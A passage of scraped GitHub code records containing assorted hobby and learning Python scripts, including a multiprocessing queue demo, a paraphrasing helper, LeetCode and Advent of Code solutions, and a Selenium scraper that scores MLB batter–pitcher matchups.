如何放数据\n# q.put() # 调用Q队列对象的 put方法\n# q.full() # 查看队列是否满了,True 为满\n# q.get() # 取出数据\n# q.empty() # 判断队列为空,True 为空\n# q.get_nowait() #不等待\n\n# import multiprocessing\n# # 创建空的容器为3的Q队列\n# q = multiprocessing.Queue(3)\n# # 存放3个数据\n# q.put(123)\n# q.put(\"bobo\")\n# q.put([4, 5, 6])\n# # 取数据 >>> 先进先出\n# i = 1\n# while not q.empty():\n# print(\"取出第%d个数据是:%s \"%(i,q.get()))\n# i += 1\n\n\"\"\"Queue队列应用演示\"\"\"\n\nimport multiprocessing\n\n\ndef demo1(q):\n # 把获取数据,传入Q队列\n data = [c for c in range(1, 10)]\n for i in data:\n q.put(i)\n\n\ndef demo2(q):\n # 清洗接收队列中的数据,提取数据中的偶数\n even = []\n while not q.empty():\n d = q.get()\n if d % 2 == 0:\n q.put(d)\n # even.append(d)\n # print(even)\n\n\ndef demo3(q):\n result = []\n while not q.empty():\n result.append(q.get())\n print(result)\n\n\ndef main():\n q = multiprocessing.Queue()\n p1 = multiprocessing.Process(target=demo1, args=(q,))\n p2 = multiprocessing.Process(target=demo2, args=(q,))\n p3 = multiprocessing.Process(target=demo3, args=(q,))\n p1.start()\n p1.join()\n p2.start()\n p2.join()\n p3.start()\n p3.join()\n\n\nif __name__ == '__main__':\n main()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"ww35133634/chenxusheng","sub_path":"ITcoach/python_ knowledge_point_practice/多进程queue队列解决不能访问全局变量.py","file_name":"多进程queue队列解决不能访问全局变量.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"29285471811","text":"from nltk.tokenize import sent_tokenize\nfrom parrot import Parrot\nimport streamlit as st\nfrom fuzzywuzzy import fuzz\nimport re\nfrom typing import List\nimport logging\n\nlogging.basicConfig(level=logging.NOTSET)\n\n\ndef read_txt_file(filename: str) -> str:\n with open(filename) as f:\n token = f.readlines()[0]\n return token\n\n\ndef check_text_similarity(first_text: str, second_text: str) -> float:\n \"\"\"\n Checks similarity between 2 given texts based on the fuzz partial ratio\n \"\"\"\n return (\n fuzz.partial_ratio(\n first_text,\n second_text,\n )\n / 100\n )\n\n\ndef get_most_diverse_text(original_text: str, text_variations_list: List) -> str:\n \"\"\"\n Get an original text and compare it with text variations coming as a list.\n kept_sentence: Str text coming as the least similar to the original text\n\n \"\"\"\n similarity_list = []\n\n for temp_dif_sentence in text_variations_list:\n temp_text_similarity = check_text_similarity(\n original_text, temp_dif_sentence[0].capitalize()\n )\n similarity_list.append(temp_text_similarity)\n\n min_index = similarity_list.index(min(similarity_list))\n kept_sentence = text_variations_list[min_index][0].capitalize()\n kept_sentence = kept_sentence + \". \"\n\n return kept_sentence\n\n\ndef create_paraphrase(\n parrot_model: Parrot,\n text: str,\n adequacy_threshold: float = 0.75,\n fluency_threshold: float = 0.90,\n diversity_ranker: str = \"levenshtein\",\n) -> str:\n \"\"\"\n Creates the new paraphrased text\n \"\"\"\n logging.info(\"Spliting to sentences.........\")\n sentences = re.split(\"[,.!?;]\", text)\n new_text = \"\"\n logging.info(\"Creating paraphrased text for each sentence.........\")\n for sentence in sentences:\n dif_sentences = parrot_model.augment(\n input_phrase=sentence,\n diversity_ranker=diversity_ranker,\n adequacy_threshold=adequacy_threshold,\n fluency_threshold=fluency_threshold,\n )\n\n if dif_sentences != None:\n kept_sentence = get_most_diverse_text(sentence, dif_sentences)\n new_text = new_text + kept_sentence\n\n return new_text\n\n\n@st.experimental_singleton\ndef get_model() -> Parrot:\n\n return Parrot(\n model_tag=\"prithivida/parrot_paraphraser_on_T5\",\n use_gpu=False,\n )\n","repo_name":"stavrostheocharis/quotera","sub_path":"src/analytics/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":2366,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"54"} +{"seq_id":"72822099682","text":"import graphviz\n\ndef draw_graph(node_index, edge_index, y, prediction, colors, path, label):\n subg = graphviz.Digraph(path, comment='Neighborhood-Subgraph')\n subg.attr(label=label)\n for node in node_index:\n subg.node(str(node), fontcolor=colors[prediction[node]], color=colors[y[node]])\n strings0 = []\n for ele in edge_index[0]:\n strings0.append(str(ele))\n strings1 = []\n for ele in edge_index[1]:\n strings1.append(str(ele))\n\n edge_list = [strings0, strings1]\n edge_list_trans = tuple(zip(*edge_list))\n \"\"\"\n edge_score = edge_score.tolist()\n print(len(edge_score))\n print(len(edge_list_trans))\n for ele in range(len(edge_list_trans)):\n print(round(edge_score[ele], 1))\n subg.edge(edge_list_trans[ele][0], edge_list_trans[ele][1],\n color=\"0.000 0.000 0.000 \" + str(edge_score[ele]))\n \"\"\"\n subg.edges(edge_list_trans)\n subg.render(directory=r\"C:\\Users\\Patrick\\OneDrive - student.kit.edu\\07 WS 22-23 BT\\CF-GNN Experiments\")\n\n\ndef draw_graph_without_imp_nodes(node_index, edge_index, y, prediction, prediction_index, colors, path):\n subg = graphviz.Digraph(path, comment='Neighborhood-Subgraph')\n\n for index in range(len(node_index)):\n subg.node(str(node_index[index]), fontcolor=colors[prediction[prediction_index[index]]],\n color=colors[y[node_index[index]]])\n strings0 = []\n for ele in edge_index[0]:\n strings0.append(str(ele))\n strings1 = []\n for ele in edge_index[1]:\n strings1.append(str(ele))\n\n edge_list = [strings0, strings1]\n edge_list_trans = tuple(zip(*edge_list))\n subg.edges(edge_list_trans)\n subg.render(directory=r\"C:\\Users\\Patrick\\OneDrive - student.kit.edu\\07 WS 22-23 BT\\Experiments\")\n\n","repo_name":"patrillicit/cf-gnnexplainer","sub_path":"visualization/subgraph_plotting.py","file_name":"subgraph_plotting.py","file_ext":"py","file_size_in_byte":1772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"24837981896","text":"def tokenize(code):\n tokens = []\n lines = code.split('\\n')\n for row, line in enumerate(lines):\n tokens.extend(line.split())\n return tokens\n\ndef hash_tokens(tokens):\n hash_table = {}\n row = 0\n col = 0\n for token in tokens:\n key = f'{row},{col}'\n hash_table[key] = token\n col += 1\n if col >= len(tokens):\n col = 0\n row += 1\n return hash_table\n\n\ndef search_variable(hash_table, query):\n results = []\n for key, value in hash_table.items():\n if query == key or query == value:\n results.append(value)\n return results\n\n\ndef add_variable(hash_table):\n variable_name = input(\"Ingrese el nombre de la variable: \")\n key = input(\"Ingrese la clave de la variable (en formato 'fila,columna'): \")\n hash_table[key] = variable_name\n print(\"Variable agregada con éxito.\")\n\ndef main():\n code = input(\"Ingrese el código fuente: \")\n\n tokens = tokenize(code)\n hash_table = hash_tokens(tokens)\n\n print(\"Tabla hash:\")\n for key, value in hash_table.items():\n print(f'{key}: {value}')\n\n while True:\n print(\"\\n--- MENÚ ---\")\n print(\"1. Buscar una variable\")\n print(\"2. Agregar una variable\")\n print(\"3. Salir\")\n option = input(\"Ingrese una opción: \")\n\n if option == \"1\":\n query = input(\"Ingrese el nombre de la variable o la clave (en formato 'fila,columna'): \")\n results = search_variable(hash_table, query)\n if results:\n print(f\"La clave '{query}' corresponde a la variable:\")\n for result in results:\n print(result)\n else:\n print(f\"No se encontró ninguna coincidencia para '{query}'.\")\n\n elif option == \"2\":\n add_variable(hash_table)\n\n elif option == \"3\":\n break\n\n else:\n print(\"Opción inválida. Intente nuevamente.\")\n\nif __name__ == '__main__':\n main()\n","repo_name":"Arsito15/Tabla_Hash","sub_path":"tabla_hash.py","file_name":"tabla_hash.py","file_ext":"py","file_size_in_byte":1991,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"17246546411","text":"def get_final_acc_from_instructions():\n with open('input.txt') as fin:\n input_list = fin.readlines()\n text_lst = [i.replace(\"\\n\", \"\") for i in input_list]\n text_lst = [i.split(\" \") for i in text_lst]\n\n # Initalising variables\n current_acc = 0\n instr_index_lst = []\n current_instr=0\n\n # Run until new instruction is repeated\n while current_instr not in instr_index_lst:\n instr_index_lst.append(current_instr)\n command = text_lst[current_instr][0]\n value = text_lst[current_instr][1]\n \n # Running commands\n if command == \"acc\":\n current_acc += int(value)\n current_instr += 1\n elif command == \"jmp\":\n current_instr += int(value)\n elif command == \"nop\":\n current_instr += 1\n\n return current_acc\n\nfinal_acc = get_final_acc_from_instructions()\nprint(final_acc)\n","repo_name":"cre8tion/AoC2020","sub_path":"day8/first.py","file_name":"first.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"27996924218","text":"#\n# @lc app=leetcode id=329 lang=python3\n#\n# [329] Longest Increasing Path in a Matrix\n#\n# https://leetcode.com/problems/longest-increasing-path-in-a-matrix/description/\n#\n# algorithms\n# Hard (52.42%)\n# Likes: 7836\n# Dislikes: 116\n# Total Accepted: 437.9K\n# Total Submissions: 835.1K\n# Testcase Example: '[[9,9,4],[6,6,8],[2,1,1]]'\n#\n# Given an m x n integers matrix, return the length of the longest increasing\n# path in matrix.\n# \n# From each cell, you can either move in four directions: left, right, up, or\n# down. You may not move diagonally or move outside the boundary (i.e.,\n# wrap-around is not allowed).\n# \n# \n# Example 1:\n# \n# \n# Input: matrix = [[9,9,4],[6,6,8],[2,1,1]]\n# Output: 4\n# Explanation: The longest increasing path is [1, 2, 6, 9].\n# \n# \n# Example 2:\n# \n# \n# Input: matrix = [[3,4,5],[3,2,6],[2,2,1]]\n# Output: 4\n# Explanation: The longest increasing path is [3, 4, 5, 6]. Moving diagonally\n# is not allowed.\n# \n# \n# Example 3:\n# \n# \n# Input: matrix = [[1]]\n# Output: 1\n# \n# \n# \n# Constraints:\n# \n# \n# m == matrix.length\n# n == matrix[i].length\n# 1 <= m, n <= 200\n# 0 <= matrix[i][j] <= 2^31 - 1\n# \n# \n#\n\n# @lc code=start\nclass Solution:\n def longestIncreasingPath(self, matrix: List[List[int]]) -> int:\n ROWS = len(matrix)\n COLS = len(matrix[0])\n\n dp = {} # (r,c) : longest incresing path length \n\n def dfs(r,c,prevNum):\n if r < 0 or r == ROWS or c < 0 or c == COLS or matrix[r][c] <= prevNum:\n return 0\n\n # return if in cache\n if (r,c) in dp:\n return dp[(r,c)]\n\n res = 1\n res = max(res, dfs(r-1,c,matrix[r][c]) + 1)\n res = max(res, dfs(r+1,c,matrix[r][c]) + 1)\n res = max(res, dfs(r,c-1,matrix[r][c]) + 1)\n res = max(res, dfs(r,c+1,matrix[r][c]) + 1)\n\n dp[(r,c)] = res\n\n return res\n \n\n for r in range(ROWS):\n for c in range(COLS):\n dfs(r,c,-1)\n\n lip = max(dp.values())\n\n return lip\n\n \n# @lc code=end\n\n","repo_name":"wintai9899/Leetcode-Python","sub_path":"DP/329.longest-increasing-path-in-a-matrix.py","file_name":"329.longest-increasing-path-in-a-matrix.py","file_ext":"py","file_size_in_byte":2069,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"70939900003","text":"import spacy\nfrom nominatim import *\n\ndef NER(dataframe,abbHistoryDict):\n df = dataframe.copy()\n\n nlp_xx = spacy.load('xx_ent_wiki_sm')\n ner_xx = nlp_xx.get_pipe(\"ner\")\n useful_NER_labels = ['LOC']\n changed_values_count = 0\n for i,row in df.iterrows() :\n if row.location == '':\n continue\n if row.location in abbHistoryDict:\n continue\n\n doc_xx = nlp_xx(row.location)\n processed_xx = ner_xx(doc_xx)\n\n for ent in processed_xx.ents:\n if (ent.label_ in useful_NER_labels):\n formatted_location = nominatimQueryToCountryCode(str(ent))\n if formatted_location :\n\n abbHistoryDict[formatted_location] = formatted_location\n abbHistoryDict[str(ent)] = formatted_location\n\n df.iloc[i].location = formatted_location\n changed_values_count += 1\n break\n\n changed_values_percent = changed_values_count/len(df)\n return df , changed_values_percent, abbHistoryDict\n","repo_name":"annbeg/diplom","sub_path":"NER.py","file_name":"NER.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"29343048567","text":"from textSummarizer.logging import logger\nfrom textSummarizer.pipeline.data_ingestion import \\\n DataIngestionTrainingPipeline\nfrom textSummarizer.pipeline.data_transformation import \\\n DataTransformationTrainingPipeline\nfrom textSummarizer.pipeline.data_validation import \\\n DataValidationTrainingPipeline\nfrom textSummarizer.pipeline.model_trainer import ModelTrainerTrainingPipeline\nfrom textSummarizer.pipeline.model_evaluation import ModelEvaluationTrainingPipeline\n\n\nSTAGE_NAME = 'Data Ingestion stage'\ntry:\n logger.info(f'>>>>>> Starting {STAGE_NAME}. <<<<<<')\n data_ingestion_pipeline = DataIngestionTrainingPipeline()\n data_ingestion_pipeline.main()\n logger.info(f'>>>>>> Stage {STAGE_NAME} completed. <<<<<<')\nexcept Exception as e:\n logger.exception(e)\n raise e\n\n\nSTAGE_NAME = 'Data Validation stage'\ntry:\n logger.info(f'>>>>>> Starting {STAGE_NAME}. <<<<<<')\n data_validation_pipeline = DataValidationTrainingPipeline()\n data_validation_pipeline.main()\n logger.info(f'>>>>>> Stage {STAGE_NAME} completed. <<<<<<')\nexcept Exception as e:\n logger.exception(e)\n raise e\n\nSTAGE_NAME = 'Data Transformation stage'\ntry:\n logger.info(f'>>>>>> Starting {STAGE_NAME}. <<<<<<')\n data_transformation_pipeline = DataTransformationTrainingPipeline()\n data_transformation_pipeline.main()\n logger.info(f'>>>>>> Stage {STAGE_NAME} completed. <<<<<<')\nexcept Exception as e:\n logger.exception(e)\n raise e\n\nSTAGE_NAME = 'Model Trainer stage'\ntry:\n logger.info(f'>>>>>> Starting {STAGE_NAME}. <<<<<<')\n model_trainer_pipeline = ModelTrainerTrainingPipeline()\n model_trainer_pipeline.main()\n logger.info(f'>>>>>> Stage {STAGE_NAME} completed. <<<<<<')\nexcept Exception as e:\n logger.exception(e)\n raise e\n\nSTAGE_NAME = 'Model Evaluation stage'\ntry:\n logger.info(f'>>>>>> Starting {STAGE_NAME}. <<<<<<')\n model_evaluation_pipeline = ModelEvaluationTrainingPipeline()\n model_evaluation_pipeline.main()\n logger.info(f'>>>>>> Stage {STAGE_NAME} completed. <<<<<<')\nexcept Exception as e:\n logger.exception(e)\n raise e","repo_name":"MuriloKrebsky/text_summarization","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2103,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"38807507041","text":"import re\ndef welcome_msg():\n print(\"welcome to the game, guess the answer\")\nwelcome_msg()\n# to open and read file come from \"dark_and_stormy_night_template\" file\ndef read_template(pathOfFile):\n try :\n with open(pathOfFile)as file:\n return file.read()\n except FileNotFoundError:\n raise FileNotFoundError(\"file not found\")\n # except AssertionError :\n # return(\"asseert\")\n \n\n# two arg\ndef parse_template(content):\n parse= re.findall(r'\\{(.*?)\\}', content)\n # while x\n for x in parse: \n # Adjective\n content=content.replace((x),'',2)\n\n\n \n return content, tuple(parse)\n\n\ndef merge(content,parse):\n updated=content.format(*parse)\n\n with open('assets/test7_merge.txt','w') as result:\n result.write(updated)\n return updated","repo_name":"jariryyousef/madlib_cli","sub_path":"madlib_cli/madlib_cli.py","file_name":"madlib_cli.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"40287036561","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.edge.options import Options as EdgeOptions\nfrom datetime import date\nimport csv\nimport numpy as np\n\nfrom gen_pitcher_stats import ballParkPal as getPitcherStats\nfrom gen_batter_stats import ballParkPal as getAllBattersOfTeam\n# import gen_team_stats\n\ndef getGames():\n url = 'https://www.rotowire.com/baseball/daily-lineups.php'\n tomorrowUrl ='https://www.rotowire.com/baseball/daily-lineups.php?date=tomorrow'\n options = EdgeOptions()\n options.add_argument('--start-maximized')\n options.add_experimental_option('excludeSwitches', ['enable-logging'])\n driver = webdriver.Edge(options=options)\n\n driver.get(url)\n \n # return values\n awayTeamAbbr, homeTeamAbbr, awayTeams, homeTeams, awayPitchers, homePitchers = ([] for i in range(6))\n\n path = '/html/body/div[1]/div/main/div[3]'\n lineups = driver.find_element(By.CLASS_NAME, 'lineups').find_elements(By.CLASS_NAME, 'lineup')\n for index, lineup in enumerate(lineups[:-2]):\n if index == 4:\n continue\n try:\n awayPitchers.append(lineup.find_element(By.XPATH, f'{path}/div[{index+1}]/div[2]/div[2]/ul[1]/li[1]/div[1]/a').text.split()[1])\n homePitchers.append(lineup.find_element(By.XPATH, f'{path}/div[{index+1}]/div[2]/div[2]/ul[2]/li[1]/div[1]/a').text.split()[1])\n except:\n continue\n abbrA = lineup.find_element(By.XPATH, f'{path}/div[{index+1}]/div[2]/div[1]/div/div[1]/div').text\n abbrH = lineup.find_element(By.XPATH, f'{path}/div[{index+1}]/div[2]/div[1]/div/div[2]/div').text\n if abbrA == 'CWS':\n abbrA = 'CHW'\n if abbrH == 'CWS':\n abbrH = 'CHW'\n awayTeamAbbr.append(abbrA)\n homeTeamAbbr.append(abbrH)\n nameArray = lineup.find_element(By.XPATH, f'{path}/div[{index+1}]/div[2]/a/div[1]').text.split()\n if len(nameArray) > 2:\n awayTeams.append(' '.join(nameArray[0:2]))\n else:\n awayTeams.append(lineup.find_element(By.XPATH, f'{path}/div[{index+1}]/div[2]/a/div[1]').text.split()[0])\n homeTeams.append(lineup.find_element(By.XPATH, f'{path}/div[{index+1}]/div[2]/a/div[2]').text.split()[0])\n\n driver.quit()\n\n return awayTeamAbbr, homeTeamAbbr, awayTeams, homeTeams, awayPitchers, homePitchers\n\ndef main():\n awayTeamAbbr, homeTeamAbbr, awayTeams, homeTeams, awayPitchers, homePitchers = getGames()\n\n # for awayTeam in awayTeams:\n # gen_team_stats.main(awayTeam)\n\n # for homeTeam in homeTeams:\n # gen_team_stats.main(homeTeam)\n\n batterMap = []\n batListA, batListH, parkFactorA, parkFactorH, pitchListA, pitchListH = ([] for i in range(6))\n\n for name in awayTeamAbbr:\n awayBatterStats, awayParkFactor = getAllBattersOfTeam(name)\n if name == 'KC':\n awayBatterStats = awayBatterStats[1:]\n batListA.append(awayBatterStats)\n parkFactorA.append(awayParkFactor)\n\n for name in homeTeamAbbr:\n homeBatterStats, homeParkFactor = getAllBattersOfTeam(name)\n if name == 'KC':\n homeBatterStats = homeBatterStats[1:]\n batListH.append(homeBatterStats)\n parkFactorH.append(homeParkFactor)\n\n for index, awayPitcher in enumerate(awayPitchers):\n awayPT, awayPP, awayPO, awayLines, awayHand = getPitcherStats(awayPitcher, awayTeamAbbr[index])\n pitchListA.append([awayPT, awayPP, awayPO, awayLines, awayHand])\n\n for index, homePitcher in enumerate(homePitchers):\n homePT, homePP, homePO, homeLines, homeHand = getPitcherStats(homePitcher, homeTeamAbbr[index])\n pitchListH.append([homePT, homePP, homePO, homeLines, homeHand])\n\n opsFactor = None\n numGames = len(pitchListH)\n\n for i in range(numGames):\n if len(pitchListH[i][0]) < 2:\n continue\n parkFactor = parkFactorA[i]\n for player in batListA[i]:\n score = 0\n pp = 0\n for j in range(3, 11):\n if not pitchListH[i][0][j]:\n continue\n weight = (float(player[j]) - float(pitchListH[i][0][j])) * float(pitchListH[i][1][j])\n pp += weight\n score += pp\n cmp = (float(player[11]) + float(pitchListH[i][2][0]))/2 - 0.051\n xbh = (cmp*100/0.051) * (100/125) * 10\n score += xbh\n cmp = (float(player[12]) + float(pitchListH[i][2][1]))/2 - 0.103\n bb = -(cmp*100/0.103) * (100/125) * 10\n score += bb\n cmp = (float(player[13]) + float(pitchListH[i][2][2]))/2 - 0.227\n so = -(cmp*100/0.227) * (100/125) * 10\n score += so\n cmp = (float(player[14]) + float(pitchListH[i][3][0]))/2 - 0.23\n line = (cmp*100/0.23) * (100/125) * 10\n score += line\n diff = 0\n if (player[2] == \"L\"):\n if (pitchListH[i][0][2] == \"L\"):\n diff = (float(player[15]) - float(pitchListH[i][4][0]))\n else:\n diff = (float(player[16]) - float(pitchListH[i][4][0]))\n elif (player[2] == \"R\"):\n if (pitchListH[i][0][2] == \"L\"):\n diff = (float(player[15]) - float(pitchListH[i][4][1]))\n else:\n diff = (float(player[16]) - float(pitchListH[i][4][1]))\n else:\n if (pitchListH[i][0][2] == \"L\"):\n diff = (float(player[15]) - float(pitchListH[i][4][1]))\n else:\n diff = (float(player[16]) - float(pitchListH[i][4][0]))\n score += diff\n if len(player) > 17:\n opsFactor = float(player[17]) - .736 + 1\n score *= opsFactor\n score *= parkFactor\n score /= 100\n\n batterMap.append(player[0:2] + [pitchListH[i][0][0]] + [pp] + [xbh] + [bb] + [so] + [line] + [diff] + [opsFactor] + [parkFactor] + [round(score, 1)])\n # batterMap.append(player[0:2] + [pp] + [xbh] + [bb] + [so] + [line] + [diff] + [opsFactor] + [round(score, 1)])\n\n for i in range(numGames):\n if len(pitchListA[i][0]) < 2:\n continue\n parkFactor = parkFactorH[i]\n for player in batListH[i]:\n score = 0\n pp = 0\n for j in range(3, 11):\n if not pitchListA[i][0][j]:\n continue \n weight = (float(player[j]) - float(pitchListA[i][0][j])) * float(pitchListA[i][1][j])\n pp += weight\n score += pp\n cmp = (float(player[11]) + float(pitchListA[i][2][0]))/2 - 0.051\n xbh = (cmp*100/0.051) * (100/125) * 10\n score += xbh\n cmp = (float(player[12]) + float(pitchListA[i][2][1]))/2 - 0.103\n bb = -(cmp*100/0.103) * (100/125) * 10\n score += bb\n cmp = (float(player[13]) + float(pitchListA[i][2][2]))/2 - 0.227\n so = -(cmp*100/0.227) * (100/125) * 10\n score += so\n cmp = (float(player[14]) + float(pitchListA[i][3][0]))/2 - 0.23\n line = (cmp*100/0.23) * (100/125) * 10\n score += line\n diff = 0\n if (player[2] == \"L\"):\n if (pitchListA[i][0][2] == \"L\"):\n diff = (float(player[15]) - float(pitchListA[i][4][0]))\n else:\n diff = (float(player[16]) - float(pitchListA[i][4][0]))\n elif (player[2] == \"R\"):\n if (pitchListA[i][0][2] == \"L\"):\n diff = (float(player[15]) - float(pitchListA[i][4][1]))\n else:\n diff = (float(player[16]) - float(pitchListA[i][4][1]))\n else:\n if (pitchListA[i][0][2] == \"L\"):\n diff = (float(player[15]) - float(pitchListA[i][4][1]))\n else:\n diff = (float(player[16]) - float(pitchListA[i][4][0]))\n score += diff\n if len(player) > 17:\n opsFactor = float(player[17]) - .736 + 1\n score *= opsFactor\n score *= parkFactor\n score /= 100\n\n batterMap.append(player[0:2] + [pitchListA[i][0][0]] + [pp] + [xbh] + [bb] + [so] + [line] + [diff] + [opsFactor] + [parkFactor] + [round(score, 1)])\n # batterMap.append(player[0:2] + [pp] + [xbh] + [bb] + [so] + [line] + [diff] + [opsFactor] + [round(score, 1)])\n\n arr = np.array(batterMap)\n sorterBatters = arr[arr[:, 11].argsort()[::-1]]\n\n with open(f'{date.today()}.csv','w', newline='') as f:\n w = csv.writer(f)\n w.writerow([\"Team\", \"Player\", \"Opp\", \"PP\", \"XBH\", \"BB\", \"K\", \"Line\", \"H\", \"OPS Factor\", \"Park Factor\", \"Score\"])\n # w.writerow([\"Team\", \"Player\", \"PP\", \"XBH\", \"BB\", \"K\", \"Line\", \"H\", \"OPS Factor\", \"Score\"])\n w.writerows(sorterBatters)\n\nif __name__ == '__main__':\n main()","repo_name":"ccstevie/mlb-model","sub_path":"gen_matchup_stats.py","file_name":"gen_matchup_stats.py","file_ext":"py","file_size_in_byte":8937,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"22858367855","text":"list1=[2,3,4,5,56,56,56]\r\nsearch=int(input(\"enter input to search in list\"))\r\ni=1\r\nwhile i<=1:\r\n if search in list1:\r\n p=list1.index(search)\r\n print(\"position of\",search ,\"is\",p)\r\n i=i+1\r\n else:\r\n print(\"your search is not present in list\")\r\n i=i+1\r\n","repo_name":"arman84510/python-loop","sub_path":"search position.py","file_name":"search position.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"3276337942","text":"import sys\nsys.stdin = open('input.txt')\n\nT = int(input())\nfor tc in range(1, T+1):\n A, B = map(str, input().split())\n i = 0\n cnt = 0\n while i < len(A):\n if A[i:i+len(B)] == B:\n cnt += 1\n i += len(B)\n else:\n i += 1\n text_length = len(A) - cnt * len(B) + cnt\n print('#{} {}'.format(tc, text_length))","repo_name":"kellyjung5512/TIL","sub_path":"01_algorithm_study/0817/가장 빠른 문자열 타이핑/s1.py","file_name":"s1.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"40134957349","text":"__author__ = 'Geoge'\n\nimport sys\n\nimport nltk\nfrom nltk import grammar, parse\nfrom nltk.grammar import FeatureGrammar, FeatStructNonterminal, FeatStructReader, read_grammar, SLASH, TYPE, Production\n\nfrom collections import defaultdict\nfrom floraparser import lexicon\nfrom floraparser.fltoken import FlSentence, FlToken\nfrom floracorpus.reader import AbstractFloraCorpusReader, FloraCorpusReader\n\n\nclass FGFlora(FeatureGrammar):\n @classmethod\n def fromstring(cls, input, features=None, logic_parser=None, fstruct_reader=None,\n encoding=None, fltokens:[FlToken]=None):\n \"\"\"\n Return a feature structure based ``FeatureGrammar``.\n\n :param input: a grammar, either in the form of a string or else\n as a list of strings.\n :param features: a tuple of features (default: SLASH, TYPE)\n :param logic_parser: a parser for lambda-expressions,\n by default, ``LogicParser()``\n :param fstruct_reader: a feature structure parser\n (only if features and logic_parser is None)\n \"\"\"\n if features is None:\n features = (TYPE, SLASH)\n\n if fstruct_reader is None:\n fstruct_reader = FeatStructReader(features, FeatStructNonterminal,\n logic_parser=logic_parser)\n elif logic_parser is not None:\n raise Exception('\\'logic_parser\\' and \\'fstruct_reader\\' must '\n 'not both be set')\n\n start, productions = read_grammar(input, fstruct_reader.read_partial,\n encoding=encoding)\n # if fltokens:\n # for fltoken in fltokens:\n # for lexent in fltoken.lexentry:\n # lexlhs = lexent\n # # lexlhs[TYPE] = lexent['pos']\n # newprod = Production(lexlhs, (fltoken,))\n # productions.append(newprod)\n\n for wordtuple, featlist in lexicon.lexicon.items():\n for lexent in featlist:\n lexlhs = lexent\n newprod = Production(lexlhs, (wordtuple,))\n productions.append(newprod)\n\n return FeatureGrammar(start, productions)\n\n\ntrec = defaultdict(lambda: None)\n\ndescription = 'stems with paired raised lines or quadrangular, olive-green to purplish, rugulose-tuberculate at first' # , becoming subterete, purplish-grey and smooth or remaining rugulose'\n\ntrec['description'] = description\ntrdr = [trec]\nttaxa = AbstractFloraCorpusReader(reader=trdr)\n\nwith open('flg.fcfg', 'r', encoding='utf-8') as gf:\n gs = gf.read()\n\nttrace = 4\nof = sys.stdout\nif __name__ == '__main__':\n if False:\n ttrace = 0\n ttaxa = FloraCorpusReader(db=r'..\\resources\\efloras.db3',\n query=\"Select * from Taxa where genus = 'Salacia' and species = 'erecta';\", )\n of = open('testphrases.txt', 'w', encoding='utf-8')\n alltokens = [tk for taxon in ttaxa.taxa for sent in taxon.sentences for tk in sent.tokens]\n flgr = FGFlora.fromstring(gs, fltokens=alltokens)\n parser = parse.FeatureEarleyChartParser(flgr, trace=ttrace)\n for taxon in ttaxa.taxa:\n for sent in taxon.sentences:\n for i, phrase in enumerate(sent.phrases):\n # trees = list(parser.parse(phrase.tokens))\n trees = []\n chart = parser.chart_parse(tk.lexwords for tk in phrase.tokens)\n # charedges = list(chart.select(is_complete=True, lhs='CHAR'))\n # for charedge in charedges:\n # for tree in chart.trees(charedge, complete=True, tree_class=nltk.Tree):\n # trees.append(tree)\n #\n treegen = chart.parses(flgr.start(), tree_class=nltk.Tree)\n trees = list(treegen)\n if trees:\n print('Success: ' + phrase.text, file=of)\n print('No. of trees: %d' % len(trees), file=of)\n if ttrace:\n for treex in trees:\n treex.draw()\n else:\n print('Fail: ' + phrase.text, file=of)\n of.close()\n\n","repo_name":"ggosline/taxonparser","sub_path":"src/floras-nltk/floraparser/testnltk3.py","file_name":"testnltk3.py","file_ext":"py","file_size_in_byte":4192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"41177762747","text":"from collections import deque\nfrom sys import stdin\n\n\n# 체스 말 이동 방향\ndef next_pos():\n return [[-1, -2], [-2, -1], [-2, 1], [-1, 2], [1, 2], [2, 1], [2, -1], [1, -2]]\n\n\n# BFS\ndef solution(size, cur_y, cur_x, end_y, end_x):\n visited = [[False for i in range(size)] for j in range(size)]\n visited[cur_y][cur_x] = True\n q = deque()\n q.append([cur_y, cur_x, 0])\n while len(q) > 0:\n y, x, count = q.popleft()\n # 목적지 도착 시 결과 값 반화\n if y == end_y and x == end_x:\n return count\n # 이동 가능한 위치인 경우 큐에 추가\n for ny, nx in next_pos():\n next_y, next_x = y + ny, x + nx\n if (\n 0 <= next_y < size\n and 0 <= next_x < size\n and not visited[next_y][next_x]\n ):\n visited[next_y][next_x] = True\n q.append([next_y, next_x, count + 1])\n return -1\n\n\nif __name__ == \"__main__\":\n n = int(stdin.readline())\n for _ in range(n):\n l = int(stdin.readline())\n cy, cx = map(int, stdin.readline().strip().split())\n ey, ex = map(int, stdin.readline().strip().split())\n print(solution(l, cy, cx, ey, 